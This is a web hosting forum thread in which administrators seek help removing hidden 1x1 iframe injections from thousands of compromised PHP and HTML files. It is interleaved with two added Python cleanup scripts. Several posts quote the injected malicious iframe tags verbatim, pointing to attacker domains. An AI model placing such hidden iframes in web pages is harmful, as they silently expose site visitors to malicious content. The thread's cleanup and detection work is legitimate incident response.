The Community Forums


Need help removing tag from thousands of files

Discussion in 'General Discussion' started by ccccanada, Dec 21, 2006.

  1. ccccanada

    Hello!

    Somehow on Aug 21 some hacker was able to compromise one of our servers and placed the following tag at the end of the page on tens of thousands of php and html documents both inside and outside of the /home directory.

    <iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>

    Since all the files that were affected were changed on the same day, I was able to get lists of affected documents on the server with the following commands.

    find / -perm 766 -exec ls -al {} \; | grep "Aug 21" > files766.txt

    find / -perm 666 -exec ls -al {} \; | grep "Aug 21" > files666.txt

    find / -perm 777 -exec ls -al {} \; | grep "Aug 21" > files777.txt

    The above command makes a text file with a list of all documents changed on that day and with certain permissions set, and places it in the directory from where you ran the command.

    However now I am looking for help to find out if someone knows a command that will delete the line from all affected documents without me having to spend a month doing it manually.

    If anyone can help it would be greatly appreciated.

    Thanks
    Harold
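The triage step in the post above (list files whose modification date is the day of the compromise and whose mode is world-writable), as an added Python example that is not part of the thread. It generalises the three exact `-perm` searches to any mode with the other-write bit set, skips symlinks and non-regular files, and can optionally also match on ctime, which `touch` cannot backdate the way it can mtime. The default root of /home, the positional date argument and the `--ctime` flag are assumptions made for this example.

```python
import os
import stat
import sys
from datetime import date, datetime


def find_suspect_files(root, day, require_world_writable=True, also_ctime=False):
    """Return sorted (path, octal mode) pairs for regular files under `root`
    whose modification date is `day` and, by default, whose mode has the
    other-write bit set (covers 666, 766, 777 and any other o+w mode).

    With also_ctime=True a file also matches when its ctime falls on `day`:
    touch can backdate mtime, but ctime is set by the kernel on every change.
    Symlinks are not followed and non-regular files are skipped."""
    hits = []
    for dirpath, _dirs, files in os.walk(root, followlinks=False):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable; nothing to report
            if not stat.S_ISREG(st.st_mode):
                continue  # symlink, socket, device: not a web document
            stamps = [st.st_mtime] + ([st.st_ctime] if also_ctime else [])
            if not any(datetime.fromtimestamp(t).date() == day for t in stamps):
                continue
            mode = stat.S_IMODE(st.st_mode)
            if require_world_writable and not mode & stat.S_IWOTH:
                continue
            hits.append((path, format(mode, "o")))
    return sorted(hits)


if __name__ == "__main__":
    # Usage (assumed for this example): python find_suspect.py [ROOT] [YYYY-MM-DD] [--ctime]
    args = [a for a in sys.argv[1:] if not a.startswith("--")]
    root = args[0] if args else "/home"
    day = date.fromisoformat(args[1]) if len(args) > 1 else date.today()
    for path, mode in find_suspect_files(root, day, also_ctime="--ctime" in sys.argv):
        print(f"{mode}\t{path}")
```

Redirect the output to a file, as the post does, and review it before touching anything; a world-writable web document is worth fixing regardless of whether it carries the tag.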
     
  2. Murtaza_t

    This will help you:

    Code:
    #!/bin/bash
    # The exact tag from the first post, held in one variable so it is typed once.
    TAG='<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>'
    
    # The -name patterns are quoted so the shell passes them to find unexpanded.
    # `replace` is the MySQL string-replacement utility; it edits each file in place.
    find / -type f -name '*.php' -exec replace "$TAG" '' -- {} \; > /dev/null
    
    echo "Removed Tag from PHP file"
    
    find / -type f -name '*.html' -exec replace "$TAG" '' -- {} \; > /dev/null
    
    echo "Removed Tag from HTML file"
    
    find / -type f -name '*.htm' -exec replace "$TAG" '' -- {} \; > /dev/null
    
    echo "Removed Tag from ALL files"
    
    echo "Murtaza was here"
    
    exit
    It will remove tags from all .php .html .htm

    NOTE: Please use it at your own risk.
     
  3. ccccanada

    Thank you very much i will give it a try now.
     
  4. wkdwich

    Have you found an effective means of keeping these attacks from recurring??


     
  5. nick1

    I have the same issue and I see iframe code like the following in a lot of my php and html files.

    '<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe>'

    Can anyone please tell me how to remove them?

    Thank you
     
  6. wkdwich

    please see:
    http://forums.cpanel.net/showpost.php?p=361256&postcount=157
     
  7. nick1

    Thank you, but right now I need to know how I could remove this code;

    it is in an encrypted format like

    #&449;#456&;

    when I posted that code here I saw it become the following

    '<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe>'


    :s
     
  8. wkdwich


    depending on where the codes are:
    regular html files
    regular php files
    inside a database

    you can just upload your local versions to the site again and that should make things ok.. unless they are embedded in the database, then you may have to go to phpMyAdmin and manually search and hand edit.. but as soon as you do that, stop your life and clean house.. local and remote
     
  9. nick1

    The iframe code is in php and html files, not in the database, so I think if I knew the script I could remove it.

    The issue is I don't have the backup for those files currently :(
     
  10. wkdwich



    Then you will have to save them locally, clean and reupload, it might be faster than using the file manager tool in the cpanel admin

    how many files are you talking about?? do you have root SSH access?
     
  11. nick1

    18 domains :( so you can imagine how many php and html files. Yes, I have root access
     
  12. wkdwich

    check this thread.. it's a biggie

    http://forums.cpanel.net/showpost.php?p=343535&postcount=422

    that's the only one I can find now.. and all it does is tell you which files were injected, you still have to manually repair them
     
  13. nick1

    thanks, I'm afraid to modify the search iframe string :( what should I put there :s
     
  14. wkdwich

    What I suggest is you use that tool (or the method I show below) to search the public_html directories of all the domains.. so if your server is set up like mine anything in
    /home/

    make a list of the files, then one by one.. sorry but if you have no local copies it has to be this way..

    pico -w [filename]

    you may or may not have pico.. you can use whatever editor you are familiar with.. but just delete anything from the < iframe > to and including the < /iframe > tag, save and close

    You can try the method Murtaza_t suggested, but I have not tested that and I would not trust it personally..


    the method I used:
    I created a file on the server ftphack.txt that contained:
    grep -l 'iframe' /home/*/public_html/*.htm
    grep -l 'iframe' /home/*/public_html/*/*.htm
    grep -l 'iframe' /home/*/public_html/*/*/*.htm
    grep -l 'iframe' /home/*/public_html/*/*/*/*.htm
    grep -l 'iframe' /home/*/public_html/*/*/*/*/*.htm
    grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*.htm
    grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*/*.htm
    grep -l 'iframe' /home/*/public_html/*.php
    grep -l 'iframe' /home/*/public_html/*/*.php
    grep -l 'iframe' /home/*/public_html/*/*/*.php
    grep -l 'iframe' /home/*/public_html/*/*/*/*.php
    grep -l 'iframe' /home/*/public_html/*/*/*/*/*.php
    grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*.php
    grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*/*.php
    grep -l 'iframe' /home/*/public_html/*.html
    grep -l 'iframe' /home/*/public_html/*/*.html
    grep -l 'iframe' /home/*/public_html/*/*/*.html
    grep -l 'iframe' /home/*/public_html/*/*/*/*.html
    grep -l 'iframe' /home/*/public_html/*/*/*/*/*.html
    grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*.html
    grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*/*.html


    and I ran it from the command line with output.. now I could see every file that contained iframe in it and knew what I had to repair

    your mileage may vary and you may have to change the paths depending on your OS, but this worked very well for me.. and you need to hurry here.. the longer these files stay infected the more site visitors are getting infected and the more this circle will continue to grow.. we have to stop this madness!!

    Last, I suggest highly you get your PC looked at by a very qualified professional to make sure it is clean from any keyloggers or other critters.. install KeyScrambler on your local PC, change ALL the passwords on the server AFTER you have done all that locally.. if you have a keylogger on your PC you can change the passwords till you are purple.. they will keep tabs and stay updated.. If the keylogger on your system was the issue you should be good now.. if not you MUST contact your host people and ask them to thoroughly investigate if there are other domains on the server that were hit also to determine if it was a single issue or a server compromise.


    oh and after all that is done, get everything copied locally.., you could have been done with this by now :)

    Oh and if you do run any databases use phpMyAdmin and search there for iframes to make sure it's not in there too..
     
    #14 wkdwich, Apr 22, 2008
    Last edited: Apr 22, 2008
  15. brianoz

    A little more sophistication ...
    Code:
    # -print0 / -0 keep file names with spaces intact; the parentheses group the two -name tests
    find /home -type f \( -name '*.php' -o -name '*.htm*' \) -print0 | xargs -0 grep -l iframe /dev/null
    Works on infinite depth, and when /home is too big to expand '*'.

    You can do a global replace if you use the exact string, with the replace command (think it's actually part of MySQL):

    replace old new -- filelist

    You'd have to get the iframe code exact and this would only work if it is all on one line.
     
  16. nick1

    very nice, thank you
     
  17. mesranet

    Hi,

    Today one of my clients was affected, with an iframe in all .html files; the code is as below:

    <iframe src="http://peskostruikaz.com/?click=5364991" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
    <iframe src="http://peskostruikaz.com/?click=537207C" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

    Is there any solution using 'find' to remove all those things? The problem is that 'click=537207C' is a running number.

    Please help
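Murtaza_t's `replace` script, brianoz's caveat that an exact-string replace only works when the tag sits on one line, and mesranet's running `click=` number all come down to the same job: remove a known injected tag from every .php/.htm/.html file under a tree without touching anything else. The following Python is an added example, not code from the thread or from cPanel. It strips the two tags quoted in the thread (the step57 one by exact bytes, the peskostruikaz one by a regular expression that accepts any `click=` value and any whitespace or line breaks between attributes), defaults to a dry run that only reports, keeps a `.preclean` copy of each file it rewrites, and leaves every other iframe alone. The `.preclean` suffix, the `--apply` flag and the default root of /home are assumptions made for this example.

```python
import os
import re
from pathlib import Path

# Literal tag quoted in the first post; a plain byte replace handles it,
# which is what Murtaza_t's `replace` invocation does.
STEP57_TAG = (b'<iframe width="1" height="1" src="http://step57.info/traff/index2.php" '
              b'style="border: 0;"></iframe>')

# The peskostruikaz variant from the last post: click= is a running number, so
# the value is matched as a run of alphanumerics. \s+ between attributes lets the
# tag be split across lines, which an exact-string replace cannot handle.
PESKO_RE = re.compile(
    rb'<iframe\s+src="http://peskostruikaz\.com/\?click=[0-9A-Za-z]+"\s+'
    rb'width=1\s+height=1\s+style="visibility:hidden;position:absolute">\s*</iframe>',
    re.IGNORECASE,
)


def strip_injected(data):
    """Return (cleaned_bytes, tags_removed). Only the two known tags are removed;
    every other byte, including legitimate iframes, is left exactly as it was."""
    literal_hits = data.count(STEP57_TAG)
    cleaned = data.replace(STEP57_TAG, b"")
    cleaned, regex_hits = PESKO_RE.subn(b"", cleaned)
    return cleaned, literal_hits + regex_hits


def clean_tree(root, suffixes=(".php", ".htm", ".html"), dry_run=True, backup_suffix=".preclean"):
    """Walk `root` without following symlinks and clean each regular file whose
    extension is in `suffixes`. With dry_run=True (the default) nothing is
    written; run that first and review the list. Returns {path: tags_removed}."""
    removed = {}
    for dirpath, _dirs, files in os.walk(root, followlinks=False):
        for name in files:
            path = Path(dirpath, name)
            if path.suffix.lower() not in suffixes or path.is_symlink() or not path.is_file():
                continue
            try:
                original = path.read_bytes()
            except OSError:
                continue  # unreadable or gone; skip rather than abort the sweep
            cleaned, n = strip_injected(original)
            if n == 0:
                continue
            removed[str(path)] = n
            if not dry_run:
                # Keep the infected original beside the file for the incident record,
                # then rewrite in place so the inode, owner and mode are preserved.
                Path(str(path) + backup_suffix).write_bytes(original)
                path.write_bytes(cleaned)
    return removed


if __name__ == "__main__":
    # Usage (assumed for this example): python clean_iframes.py [ROOT] [--apply]
    import sys
    positional = [a for a in sys.argv[1:] if not a.startswith("--")]
    root = positional[0] if positional else "/home"
    for p, n in sorted(clean_tree(root, dry_run="--apply" not in sys.argv).items()):
        print(f"{n}\t{p}")
```

Because the regex is anchored to the injected host and the exact attribute set, a new variant needs a new pattern rather than a broader one; matching every 1x1 iframe would also delete legitimate embeds. Cleaning the files does not close the hole they came through, so the wkdwich advice above (clean the workstation, rotate every credential, check the database) still applies.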
     